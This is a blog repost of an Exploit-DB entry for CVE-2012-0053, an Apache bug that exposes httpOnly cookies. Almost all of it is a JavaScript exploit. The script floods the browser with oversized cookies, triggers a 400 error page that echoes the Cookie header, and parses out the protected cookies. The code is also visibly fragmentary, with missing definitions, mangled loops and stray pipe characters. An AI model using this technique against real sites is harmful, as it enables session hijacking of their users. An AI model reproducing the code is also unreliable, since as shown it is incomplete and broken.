[+] Post Title :
Apache httpOnly Cookie Disclosure
[+] Date : Rabu, 01 Februari 2012
[+] Author : Dr. Cruzz
[+] Link : http://xcruzz.blogspot.com/2012/02/apache-httponly-cookie-disclosure.html
[+] Type :
Exploit
EDB-ID : 18442 CVE: 2012-0053 OSVDB-ID: N/A
Author : pilate Published: 2012-01-31 Verified:
Exploit Code : DownloadVulnerable App: N/A
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple |
function setCookies (good) { |
// Construct string for cookie value |
for (var i=0; i< 819 ; i++) { |
for ( i = 0 ; i < 10; i++) { |
var cookie = "xss" +i+"=; expires = "+new Date(+new Date()-1).toUTCString()+" ; path=/;"; |
var cookie = "xss" +i+"="+str+";path=/"; |
document.cookie = cookie; |
function parseCookies () { |
// Only react on 400 status |
if (xhr.readyState === 4 && xhr.status === 400) { |
// Replace newlines and match <pre> content |
var content = xhr.responseText.replace(/\r|\n/g,'').match(/< pre >(.+)<\/pre>/); |
content = content[1].replace("Cookie: ", ""); |
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g); |
for (var i=0; i<cookies.length; i++) { |
var s_c = cookies[i].split('=',2); |
cookie_dict[s_c[0]] = s_c[1]; |
// Unset malicious cookies |
alert(JSON.stringify(cookie_dict)); |
var xhr = new XMLHttpRequest(); |
xhr.onreadystatechange = parseCookies; |
xhr.open("GET", "/", true); |
makeRequest();
0 komentar:
Posting Komentar